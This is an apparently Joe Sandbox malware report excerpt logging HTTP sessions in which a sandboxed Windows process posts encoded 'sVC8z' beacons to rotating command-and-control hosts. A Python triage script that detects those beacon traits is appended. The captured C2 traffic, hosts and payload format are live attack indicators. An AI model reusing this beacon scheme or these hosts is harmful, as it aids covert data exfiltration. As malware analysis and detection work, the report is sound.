                                                            Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            22 | 192.168.2.5 | 49981 | 202.79.161.151 | 80 | 6576 | C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 20, 2024 21:10:35.233187914 CET | 651 | OUT | POST /36be/ HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.laohub10.net
                                                            Origin: http://www.laohub10.net
                                                            Referer: http://www.laohub10.net/36be/
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                            Data Raw: 73 56 43 38 7a 3d 2b 52 57 2f 42 36 57 30 66 4b 6d 61 62 6f 68 36 6b 4a 6e 73 5a 4f 30 44 35 6f 47 50 4a 76 53 32 32 4e 36 46 75 6d 56 6c 42 6e 2b 4b 62 66 35 33 32 78 77 4c 39 5a 31 64 71 39 42 38 69 73 37 33 47 50 79 73 38 75 41 73 38 41 65 71 2f 6e 4f 4a 42 4f 34 2b 30 77 56 47 77 76 6a 4a 63 53 79 33 36 4f 7a 30 69 65 4c 70 4e 64 70 36 55 4f 41 46 4e 37 53 6e 5a 6e 33 55 33 47 66 70 6a 52 71 61 71 53 59 77 35 7a 53 62 74 77 36 78 43 65 66 68 76 31 65 4d 61 38 6d 30 4c 6d 72 67 43 48 59 57 4c 32 34 77 74 49 4d 75 70 39 71 53 2f 59 64 75 76 2f 43 76 59 4b 56 4b 52 68 49 64 46 57 56 61 67 4e 4b 7a 33 6d 41 78 50 42 36 37 69 68 65 45 46 7a 69 34 43 7a 76 48 57 47 33 6b
                                                            Data Ascii: sVC8z=+RW/B6W0fKmaboh6kJnsZO0D5oGPJvS22N6FumVlBn+Kbf532xwL9Z1dq9B8is73GPys8uAs8Aeq/nOJBO4+0wVGwvjJcSy36Oz0ieLpNdp6UOAFN7SnZn3U3GfpjRqaqSYw5zSbtw6xCefhv1eMa8m0LmrgCHYWL24wtIMup9qS/Yduv/CvYKVKRhIdFWVagNKz3mAxPB67iheEFzi4CzvHWG3k
                                                            Nov 20, 2024 21:10:36.618599892 CET | 532 | IN | HTTP/1.1 200 OK
                                                            Server: Apache
                                                            Content-Type: text/html; charset=utf-8
                                                            Accept-Ranges: bytes
                                                            Cache-Control: max-age=86400
                                                            Age: 1
                                                            Connection: Close
                                                            Content-Length: 357
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 [TRUNCATED]
                                                            Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            23 | 192.168.2.5 | 49988 | 202.79.161.151 | 80 | 6576 | C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 20, 2024 21:10:37.903876066 CET | 1668 | OUT | POST /36be/ HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 1242
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.laohub10.net
                                                            Origin: http://www.laohub10.net
                                                            Referer: http://www.laohub10.net/36be/
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                            Data Raw: 73 56 43 38 7a 3d 2b 52 57 2f 42 36 57 30 66 4b 6d 61 62 6f 68 36 6b 4a 6e 73 5a 4f 30 44 35 6f 47 50 4a 76 53 32 32 4e 36 46 75 6d 56 6c 42 6e 47 4b 62 6f 52 33 31 57 63 4c 38 5a 31 64 6a 64 42 39 69 73 37 32 47 50 4b 6f 38 75 46 62 38 43 6d 71 2b 46 32 4a 51 4d 41 2b 76 67 56 47 74 2f 6a 55 59 53 79 59 36 4f 6a 34 69 61 58 70 4e 64 70 36 55 4e 6f 46 4e 71 53 6e 4a 58 33 54 67 32 66 74 6f 78 71 79 71 53 41 67 35 79 6e 6d 74 6a 79 78 44 2b 50 68 6a 68 2b 4d 46 4d 6d 71 47 47 72 47 43 48 64 47 4c 32 55 57 74 4a 34 45 70 36 47 53 2b 63 38 33 71 73 44 30 61 73 52 59 55 41 59 39 59 32 49 39 72 73 36 32 36 68 73 75 43 43 4b 30 30 42 6d 61 4a 79 62 73 5a 55 75 57 53 53 57 45 64 43 45 6f 2b 36 58 30 34 42 33 39 6e 75 4e 56 39 33 41 58 76 41 33 55 33 51 43 43 53 74 78 42 59 36 4b 54 56 4b 4d 35 38 31 7a 4c 68 73 38 46 34 42 30 77 73 53 69 66 4d 76 71 6b 68 43 61 67 75 4f 69 67 77 77 41 79 53 48 66 30 4b 35 4a 71 77 61 76 5a 70 59 68 4b 63 6d 79 54 7a 4b 54 57 78 33 4d 51 54 48 6e 4e 6a 49 32 54 42 67 2b 6d [TRUNCATED]
                                                            Data Ascii: sVC8z=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 [TRUNCATED]
                                                            Nov 20, 2024 21:10:39.303628922 CET | 532 | IN | HTTP/1.1 200 OK
                                                            Server: Apache
                                                            Content-Type: text/html; charset=utf-8
                                                            Accept-Ranges: bytes
                                                            Cache-Control: max-age=86400
                                                            Age: 1
                                                            Connection: Close
                                                            Content-Length: 357
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 [TRUNCATED]
                                                            Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            24 | 192.168.2.5 | 49995 | 202.79.161.151 | 80 | 6576 | C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 20, 2024 21:10:40.561042070 CET | 369 | OUT | GET /36be/?sVC8z=zT+fCPSXWqCfWPgMnoOydtJKsJuCEtGx9/DVuG0pIlquWt59hgdSk8Rx6eVvndf2YPyLwPhL3z2g/EyQU+U7tD9cl/byRSbJ8t/R3+K3cKRBXN0bJbe4ZjKihmDBlTXN1Q==&PPP=FHWL56 HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Connection: close
                                                            Host: www.laohub10.net
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                            Nov 20, 2024 21:10:42.010817051 CET | 532 | IN | HTTP/1.1 200 OK
                                                            Server: Apache
                                                            Content-Type: text/html; charset=utf-8
                                                            Accept-Ranges: bytes
                                                            Cache-Control: max-age=86400
                                                            Age: 1
                                                            Connection: Close
                                                            Content-Length: 357
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 [TRUNCATED]
                                                            Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>
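Added triage example (not part of the Joe Sandbox report): the HTTP sessions in this part of the report (18 to 25) share one shape, and that shape, not any single Host, is what a detection should key on. Every request from PID 6576 carries the same User-Agent (Chrome/31.0.1650.63 on "Linux i686", sent by a Windows process under C:\Program Files (x86)), the POSTs set Origin and Referer to the request's own host and path, and the body or query string is a single field, sVC8z, whose value is base64-looking and is sent with raw '+', '/' and '=' that a browser form post would have percent-encoded. The same 206-, 226- and 1242-byte POSTs followed by a GET with &PPP=FHWL56 repeat against www.logidant.xyz (45.141.156.114), www.laohub10.net (202.79.161.151) and then www.zkdamdjj.shop (104.21.40.167); neither the nginx 404 nor the 200 whose body is only a JavaScript redirect to cdn-bj.trafficmanager.net stops the sequence, the process simply moves to the next Host. The Python below parses raw requests and flags those traits. The host names, paths and payload values are copied from sessions 18, 20 and 21; the request skeleton, the benign intranet.example login post used for contrast, the 64-character minimum and the [A-Z0-9]{4,8} token pattern are the example's own assumptions.

```python
import base64
import re
from collections import defaultdict
from urllib.parse import urlsplit

# The User-Agent carried by every request in sessions 18-25 of this report.
OBSERVED_UA = ("Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 "
               "(KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36")
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")

def parse_request(raw: str) -> dict:
    """Split a raw CRLF-terminated HTTP/1.1 request into method, target, headers, body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers, "body": body}

def split_form(data: str) -> dict:
    """k=v&k=v splitter that does NOT percent-decode: parse_qsl would turn the raw '+'
    in these payloads into spaces and hide that the client never URL-encoded its field."""
    fields = {}
    for part in data.split("&"):
        if "=" in part:
            key, value = part.split("=", 1)
            fields[key] = value
    return fields

def looks_base64(value: str, min_len: int = 64) -> bool:
    """Long, base64 alphabet only, and decodes once padding is normalised."""
    if len(value) < min_len or not B64_RE.match(value):
        return False
    stripped = value.rstrip("=")
    if len(stripped) % 4 == 1:  # no base64 string has this length
        return False
    try:
        base64.b64decode(stripped + "=" * (-len(stripped) % 4), validate=True)
        return True
    except ValueError:  # binascii.Error is a ValueError subclass
        return False

def payload_fields(req: dict) -> dict:
    """Form fields of a POST body, or of the query string for a GET."""
    data = req["body"] if req["method"] == "POST" else urlsplit(req["target"]).query
    return split_form(data)

def indicators(req: dict) -> list:
    """Names of the beacon traits this request matches (empty when none)."""
    hdr, url, found = req["headers"], urlsplit(req["target"]), []
    host = hdr.get("host", "")
    values = list(payload_fields(req).values())
    if hdr.get("user-agent") == OBSERVED_UA:
        found.append("observed-ua")
    if hdr.get("origin") == f"http://{host}" and hdr.get("referer") == f"http://{host}{url.path}":
        found.append("self-referer")
    if (req["method"] == "POST" and hdr.get("content-type") == "application/x-www-form-urlencoded"
            and len(values) == 1 and looks_base64(values[0])):
        found.append("single-b64-field-post")
    if (req["method"] == "GET" and len(values) == 2 and looks_base64(values[0])
            and re.fullmatch(r"[A-Z0-9]{4,8}", values[1])):
        found.append("b64-query-plus-short-token")
    return found

def hosts_per_key(requests: list) -> dict:
    """Hosts grouped by the first form field name each request used. One key sent to
    several unrelated domains is the rotation seen here; blocking only the first
    domain observed does not stop the beacon."""
    seen = defaultdict(set)
    for req in requests:
        for key in list(payload_fields(req))[:1]:
            seen[key].add(req["headers"].get("host", ""))
    return {key: sorted(hosts) for key, hosts in seen.items()}

def _beacon(method, host, path, query="", body=""):
    """Constructed request skeleton using the header set seen in sessions 18-25."""
    headers = [f"Host: {host}", f"User-Agent: {OBSERVED_UA}", "Accept: */*", "Connection: close"]
    if method == "POST":
        headers += [f"Content-Length: {len(body)}", "Content-Type: application/x-www-form-urlencoded",
                    f"Origin: http://{host}", f"Referer: http://{host}{path}"]
    target = f"{path}?{query}" if query else path
    return f"{method} {target} HTTP/1.1\r\n" + "\r\n".join(headers) + "\r\n\r\n" + body

# Payload values copied from sessions 18, 20 and 21 of this report, wrapped in the
# constructed skeleton; the last entry is a constructed benign login post for contrast.
SAMPLE_REQUESTS = [
    _beacon("POST", "www.logidant.xyz", "/iuvu/", body="sVC8z=1E6C75TZpJNESbCxLthrBHTcNWFAe2vfG/YLzz67OT5VGFoX0SrhAZEIKMfrUU+9RgTfam69h8tu0oh4vbyKXFb/31SUwYHAn5wjb64ABJ7Y++AMST5YkQ55B+Gz/Ey32iuRb3bTBHZlWO5et4q5bs4vwpVd7aP1uz/qXgzucCcKYCRCpUlru2TOyxBHqA6U+oWxLQQKYcBuH6vaJgrAk6KaPYFU"),
    _beacon("GET", "www.logidant.xyz", "/iuvu/", query="sVC8z=4GSi4NjhieA+eby0NKQzTEPCPA5td1TZNopVgGr+MixqN2kv+x7vZ9YkKN38Qwr7I1LnRiqAhNhB07BIn5ynY1PA81WB0aqcrP8TCrRqA4T6i/Y0YCRnlTl6YfLJ6nzbiw==&PPP=FHWL56"),
    _beacon("POST", "www.laohub10.net", "/36be/", body="sVC8z=+RW/B6W0fKmadIx6oPvsM+0ClYGPGPTx2NmFuikuAVqKc+J31zILw51dldB5sM61GP2K8ros8E+q/iyJBf493AVEp/jLYSy36Oz0iabPNZF6X/wFMaSoXH3Tg2fpoxqeqSYG52K9t2+xCcHhvg+LNsmuFGqCIioTO2gboqJ358ep+usE1dKHLq5yByAqUm0z6uaDpxU="),
    "POST /login HTTP/1.1\r\nHost: intranet.example\r\nUser-Agent: Mozilla/5.0\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 27\r\n\r\n"
    "user=alice&password=hunter2",
]

def triage(raw_requests=SAMPLE_REQUESTS) -> dict:
    """Per-request indicator lists plus the host rotation table."""
    parsed = [parse_request(r) for r in raw_requests]
    return {"per_request": [indicators(r) for r in parsed], "hosts_per_key": hosts_per_key(parsed)}
```

Feed it request bodies carved from the pcap rather than the sample list, and threshold on the combination (several traits on one request, or one field name reaching two or more Hosts from the same PID) rather than on any single trait, since each one alone is weak evidence. The 226-byte and 206-byte Content-Length values the skeleton produces for the two copied POST bodies match sessions 18 and 21, which is a quick check that the payloads were carved intact.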


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            25 | 192.168.2.5 | 50002 | 104.21.40.167 | 80 | 6576 | C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 20, 2024 21:10:47.760278940 CET | 634 | OUT | POST /kf1m/ HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 206
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.zkdamdjj.shop
                                                            Origin: http://www.zkdamdjj.shop
                                                            Referer: http://www.zkdamdjj.shop/kf1m/
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                            Data Ascii: sVC8z=tBXlMSkIxJ8XDJ1cXHeN8n4y37QIEPGaBIFHLZs15gbgsL4tVGZM0LzX1Hqfp8n1fRdRYBOz9A3ND/pZ2k0JfISXfcBIqg4Zt+2lOjTlJJLwIN8cw13Rus96Qvp/z5HgBKj+gc6joOngJyccfaBuCI4ScWCQ06uS6zO6+SD4K/oVgtJS8dAVpNlon5bOenbFWlc8Tdg=


Session ID: 26 | Source IP: 192.168.2.5 | Source Port: 50003 | Destination IP: 104.21.40.167 | Destination Port: 80 | PID: 6576 | Process: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
Timestamp: Nov 20, 2024 21:10:50.420706987 CET | Bytes transferred: 654 | Direction: OUT
POST /kf1m/ HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.zkdamdjj.shop
                                                            Origin: http://www.zkdamdjj.shop
                                                            Referer: http://www.zkdamdjj.shop/kf1m/
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                            Data Ascii: sVC8z=tBXlMSkIxJ8XDoFcMniNrX4tprQIOvGeBIZHLYoc+T/gtuctWExM3LzX+nr00snifRZjYDqz9EnND+ZZxXMIeYSVX8BOkA4Zt+2lOjuOJJTwIZAchk3Wts9lVvp/35HkBKirgdWdoMvgJ2MceO1tRo4QDGDb5Jr4iSmXjzX9R/w1hb44m/I96tJQ3qT5PX6sMGMMNK25PEw91vWbtOVIXEEQu1Al


Session ID: 27 | Source IP: 192.168.2.5 | Source Port: 50004 | Destination IP: 104.21.40.167 | Destination Port: 80 | PID: 6576 | Process: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
Timestamp: Nov 20, 2024 21:10:53.078188896 CET | Bytes transferred: 1671 | Direction: OUT
POST /kf1m/ HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 1242
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.zkdamdjj.shop
                                                            Origin: http://www.zkdamdjj.shop
                                                            Referer: http://www.zkdamdjj.shop/kf1m/
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                            Data Ascii: sVC8z=tBXlMSkIxJ8XDoFcMniNrX4tprQIOvGeBIZHLYoc+T3gtYQtUlxM2LzX3HqT0smgfRgqYDWJ9C7NCcRZwmMIUYSVIsBLqg5Et+nsOiCOJJTwIfkch13Wrs96QvpJz5HABK7cgdjm0vXgKWccc9dtLo4WCGCb5OjjiSqtjySSR9g1self9eEmvbtf4rHUOASyGk92HKOeEQ4G5KCUk/oUIBcEqBtvVSJwzil6SR6FJ6x15fPKy4FffcpK6hcb1VuozF1IJ17rwGj/J+2D99YmKp2BxdbK4G8fGUNmWFjJzoaLVPXEKj+SyTVAuYpIyDiqSh0b5GlpB7VAhDsHO07fivWF0h7d3lPjJst98+w9h/BAcpUEXB18/+05nZaoR1Fy9E1VURXpMw5hkC1AJnuo7nP/8wkefZFFfH8aKZZU0Tg8KYVkL91XIk3f83UW5z+SvZJWI/IqM39R++SfHxQLRpS30tW74SkvfW6ILteCaxnRIdx4EASleOAm3ilTUOyWopWpsjRShsRXIFKYXjR0ex6m3na/hatVKa17jtBFg8RjLm3inQ1CK2U68f9VPMPkpBlHHE+38R3TegZo7uyUvZJSC4r298uyTIJC2YMjK7kCRzUzWYrnaiYAaj825qtqqkI3TNGY6kGpoei56A8YFMK0D7Z8IUggG0zpf/SXWEeI0+pS4ZzLVqIA+fiGTBtGJbFFkVMasF6oRnHz9GDLrTZc9vdM4W3Dypp42ylRS/13jcLlRIEo8XRbEUfW9YGdt4YNRnxIXZXaG4OYrKcyvW/u3GP4cHGEPXcBb37NPSpkRIMLGKeOynN2zk7j1KvyfJRvGQF2MRLQpaDr3ws9fa1NiOC3J/1m2IIXMiztwUoHgs1GgrL5/kCgyqf1xZb2KmGp3LsyjlC4jJnDJzCbS0RXy6TXE4hzwasPP59E3XXli4bDBQ0Y0gH0Pp+zxcvRY58PpkK3bA1ve0qTdboHv30CfuYKNHRw6SWPTvWxagbcVe [TRUNCATED]


Session ID: 28 | Source IP: 192.168.2.5 | Source Port: 50005 | Destination IP: 104.21.40.167 | Destination Port: 80 | PID: 6576 | Process: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
Timestamp: Nov 20, 2024 21:10:55.732326984 CET | Bytes transferred: 370 | Direction: OUT
GET /kf1m/?sVC8z=gD/FPiA75bYZCbZDbB+WsVUzjKMJP+r4HqBHW8I3+Q/3qqcwdH4XqO3fnm/yt4rkfBlpHF229jnZH/lk0nBoRPOyc9x0vhFbku7Ub3qNJZbDXed1slXSq/MHP91YwZ61FA==&PPP=FHWL56 HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Connection: close
                                                            Host: www.zkdamdjj.shop
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Timestamp: Nov 20, 2024 21:10:57.742898941 CET | Bytes transferred: 1236 | Direction: IN
HTTP/1.1 301 Moved Permanently
                                                            Date: Wed, 20 Nov 2024 20:10:57 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            cache-control: no-cache, must-revalidate, max-age=0
                                                            x-redirect-by: WordPress
                                                            location: https://zkdamdjj.shop/kf1m/?sVC8z=gD/FPiA75bYZCbZDbB+WsVUzjKMJP+r4HqBHW8I3+Q/3qqcwdH4XqO3fnm/yt4rkfBlpHF229jnZH/lk0nBoRPOyc9x0vhFbku7Ub3qNJZbDXed1slXSq/MHP91YwZ61FA==&PPP=FHWL56
                                                            x-litespeed-cache-control: public,max-age=3600
                                                            x-litespeed-tag: 02a_HTTP.404,02a_HTTP.301,02a_404,02a_URL.fe2f0d048587da8ccb778a9020edc358,02a_
                                                            x-litespeed-cache: miss
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=69g7s59XLZ2tTZjZy%2B%2B8CZdEn6Nx3PgjnY6yEZwiw34CLbIwk6IOphwqrzlZ4JZyvYstr2RQJDICtZMNr1qujV7Q6G4q5xU2ELF%2F6l5qIwFmfC4rZog7Sl4E26CkKGuzrAOiqQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8e5b16185dee436d-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1711&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=370&delivery_rate=0&cwnd=158&unsent_bytes=0&cid=00000000000000
                                                            Data Raw:
                                                            Data Ascii:
Timestamp: Nov 20, 2024 21:10:57.742994070 CET | Bytes transferred: 20 | Direction: IN
Data Raw: 30 26 74 73 3d 30 26 78 3d 30 22 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 0&ts=0&x=0"0


Session ID: 29 | Source IP: 192.168.2.5 | Source Port: 50006 | Destination IP: 13.248.169.48 | Destination Port: 80 | PID: 6576 | Process: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
Timestamp: Nov 20, 2024 21:11:03.428093910 CET | Bytes transferred: 619 | Direction: OUT
POST /k1td/ HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 206
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.tals.xyz
                                                            Origin: http://www.tals.xyz
                                                            Referer: http://www.tals.xyz/k1td/
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                            Data Ascii: sVC8z=lGkRzIOh6zQ2f3zfWLelqdNCH2OTlQd3XFt2AzJP0RPegoffkOSG3ZVsRsTgkP7cXcbIlqoHIvPwiKweYUERXlb3dgtoJT6NFEXYHgoAYdsM892pHXaxHefTs0GK4V2gxYS0NBlaaDDErjomh3YXjAU1k6kYKNrqJ/UVcdFYPplSFn6FzeKfjfaPXIcRTA/oPVPblc8=


